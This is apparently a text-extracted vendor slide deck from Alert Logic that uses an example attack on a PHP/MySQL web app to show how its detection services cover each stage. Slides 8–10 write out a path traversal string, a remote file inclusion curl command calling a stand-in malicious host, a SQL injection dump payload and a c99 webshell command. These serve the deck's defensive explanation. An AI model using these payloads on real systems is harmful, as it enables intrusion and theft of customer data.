This document discusses security in the cloud and describes Alert Logic's approach to cloud security. It provides an example attack scenario on a classic 3-tier web application and assesses Alert Logic's capabilities in detecting each step of the attack. These include reconnaissance, entry/data exfiltration, command and control, and establishing a persistent foothold. The document outlines how Alert Logic provides asset visibility, network inspection, deep HTTP inspection, and integrated security experts to provide deep threat visibility and coverage across the infrastructure.

1. Mark Brooks
VP Solution Engineering, Alert Logic
REALITIES OF
SECURITY IN THE
CLOUD

2. Security is a challenge.

3. Security Has Changed

4. Security in the Cloud is a Shared Responsibility
PROVIDES
• Secure coding and best practices
• Software and virtual patching
• Configuration management
• Access management
• Application level attack monitoring
• Access management
• Patch management
• Configuration hardening
• Security monitoring
• Log analysis
• Network threat detection
• Security monitoring
• Logical network segmentation
• Perimeter security services
• External DDoS, spoofing, and scanning prevented
• Hardened hypervisor
• System image library
• Root access for customer
• Configuration
best practices

5. Let’s talk about security coverage.

6. Tame the Beast
Industry Challenge: The Good, the Bad and the Ugly
Known Good
Known Bad
Suspicious
Allow
Identify | Tune | Permit
Block
Drop | Reconfigure
Application Stack
Web Apps
Server-side Apps
App Frameworks
Dev Platforms
Databases
Server OS
Hypervisor
Hardware Classification Action
HUMAN EXPERT
REQUIRED

7. Classic 3-Tier Web Application Key Target Assets
Key target assets for attack
Across the Full Stack
1. Custom application
2. Web server implementation
Apache, IIS, NGINGX
3. Application server implementation
Tomcat, Jboss, Jetty, ASP
4. Web server frameworks and
languages
Struts, PHP, Java
5. Databases
mySql, Oracle, MSSQL,..
6. AWS services
IAM, EC2, S3
EC2 instances
EC2 instances
VPC
Route 53
Users Internet
gateway
ELB
DB instance
DB instance
AvailabilityzoneAAvailabilityzoneB
Auto scaling
group
Web App Server
Auto scaling
group
S3
EC2 instances
EC2 instances

8. An attack scenario - Recon
VPC
Route 53
Internet
gateway
ELB
mySQL instance
On linux
AvailabilityzoneAAvailabilityzoneB
S3
Bastion
Host
PHP
Application
On Linux
1 – Performs low-frequency app-scan
2 – Tests path traversal and enumerates directories
3 – Tests remote file inclusion
Recon
Recon
• low slow application level scan
• Attacker learns PHP app, on linux, likely
mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=..
/../../../etc
• Path traversal is successful. Attacker
enumerates server directories.
• tests remote file inclusion vulnerability
Curl -X POST -F 'url=http [://] malicious
[dot] com/test.php' http [://] mysite [dot]
com/wp-content/plugins/site-
import/admin/page.php>
Attacker learnings: vulnerable PHP/mySql app,
prone to both smash’n grab attacks as more
persistent attack approaches

9. Entry and data exfiltration
• Attacker launches a series of SQL-I injection discovery
attempts
• Gets a dump-in-one-shot attack and gets full table return
http://victim.com/report.php?id=23 and(select (@a) from
(select(@a:=0x00),(select (@a) from (information_schema.schemata)where
(@a)in (@a:=concat(@a,schema_name,'<br>'))))a)
Attacker achievements: obtained sensitive customer-data without need for local
process or system breaches on servers
An attack scenario – opportunistic exfiltration
VPC
Route 53
Internet
gateway
ELB
mySQL instance
On linux
AvailabilityzoneAAvailabilityzoneB
S3
Bastion
Host
PHP
Application
On Linux
4 - SQL-I data extraction attack
Recon
• low slow application level scan
• Attacker learns PHP app, on linux, likely mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=../../../../etc
• Path traversal is successful. Attacker enumerates server directories.
• tests remote file inclusion vulnerability
Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http
[://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php>
Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks
as more persistent attack approaches
Entry/Exfil

10. VPC
Route 53
Internet
gateway
ELB
mySQL instance
On linux
AvailabilityzoneAAvailabilityzoneB
S3
Bastion
Host
PHP
Application
On Linux
5 - Webshell injection
6 - Commanding through Shell
Command and control (C&C)
• Attacker uploads c99 webshell via RFI vulnerability
• Persistent foothold for lateral movement established
curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64='
-F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F
'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http
[://] mysite [dot] com/path/to/c99
Attacker achievements: obtained foothold for further action and lateral
movement
Entry and data exfiltration
• Attacker launches a series of SQL-I injection attempts
• Gets a dump-in-one-shot attack and gets full table return
Attacker achievements: obtained sensitive customer-data without need for local
process or system breaches on servers
Recon
• low slow application level scan
• Attacker learns PHP app, on linux, likely mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=../../../../etc
• Path traversal is successful. Attacker enumerates server directories.
• tests remote file inclusion vulnerability (RFI)
Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks
as more persistent attack approaches
An attack scenario – persistent foothold
Command and control

11. Deep
Application
threat visibility
Network inspection
Expert
SOC
Analysis of
Findings
Network,
system,
application
infrastructure
threat visibility
Alert Logic’s Approach
Cloudtrail
Config&VulnAssessment Foundation
Asset and
exposure
visibility
Log Collection
HTTP Inspection
Expert
Curation,
R&D of
Content and
Intel
Analytics
and
Machine
Learning
Content
and
Intel
Application
level Web
Attacks
OWASP Top
10
Attacks against
vulnerable
platforms and
libraries
Attacks against
miscon-
figurations

12. Coverage needed for this scenario
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Recon
Entry
Exfil
C&C
Cloudtrail
Overall combined
coverage scorecard
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
How much can we see?

13. Coverage needed for this scenario
Foundation
Asset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Recon
Entry
Exfil
C&C
Cloudtrail
Config&VulnAssessment
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage

14. Network,
system,
application
infrastructure
threat visibility
Coverage needed for this scenario
Foundation
Asset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Network inspection
providers visibility on
attacker actions on the
known vulnerabilities
exploited in the attack
and their success
Recon
Entry
Exfil
C&C
Network inspection
Cloudtrail
Config&VulnAssessment
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage

15. Deep
Application
threat visibility
Network,
system,
application
infrastructure
threat visibility
Coverage needed for this scenario
Foundation
Asset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Network inspection
providers visibility on
attacker actions on the
known vulnerabilities
exploited in the attack
and their success
Deep HTTP inspection
on requests and
responses, learning and
anomaly detection
deepens coverage for
whole classes of
application attacks
Recon
Entry
Exfil
C&C
Network inspection
Cloudtrail
Config&VulnAssessment
Log Collection
HTTP
Inspection
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage

16. SECURITY
EXPERTS
Integrated Security Model
Incident
Investigation
System
Visual | Context | Hunt
Data & Event
Sources
Assets | Config | Logs
Automatic
Detection
Block | Alert | Log
ML Algorithms
Rules & Analytics
Security
Researchers
Data
Scientists
Software
Programmers
Integrated: Infrastructure | Content | Human Experts
Security
Analysts

17. We designed security for cloud and hybrid environments
GET STARTED IN MINUTES
MAINTAIN COVERAGE AT
CLOUD SCALE
KEEP PRODUCTION FLOWING
with modular services that
grow with you
Comply
with integration to cloud APIs
and DevOps automation
with auto-scaling support and
out-of-band detection
Single pane of glass for workload and application security
across cloud, hosted & on-premises

18. Leaders
28
8
6
4
10
25
3
5
5
11
8
10
15
24
Other
Amazon
Check Point
Chronicle Data
Cisco
Fortinet
Intel Security
Okta
Symantec
Barricade
JumpCloud
Evident.io
Palerra
Microsoft
CloudPassage
CloudCheckr
FortyCloud
ThreatStack
Alert Logic
A recognized security leader
“Alert Logic has a
head start in the cloud,
and it shows.”
PETER STEPHENSON
SC Magazine review
“…the depth and breadth
of the offering’s analytics
and threat management
process goes beyond
anything we’ve seen…”Who is your primary
in-use vendor for Cloud
Infrastructure Security?
Who are the top vendors
in consideration for Cloud
Infrastructure Security?
Alert Logic

19. Over 4,000 worldwide customers
AUTOMOTIVE HEALTHCARE
EDUCATION
FINANCIAL SERVICES
MANUFACTURING
MEDIA/PUBLISHING
RETAIL/E-COMMERCE
ENERGY & CHEMICALS
TECHNOLOGY & SERVICES
GOV’T / NON-PROFIT

20. Thank You.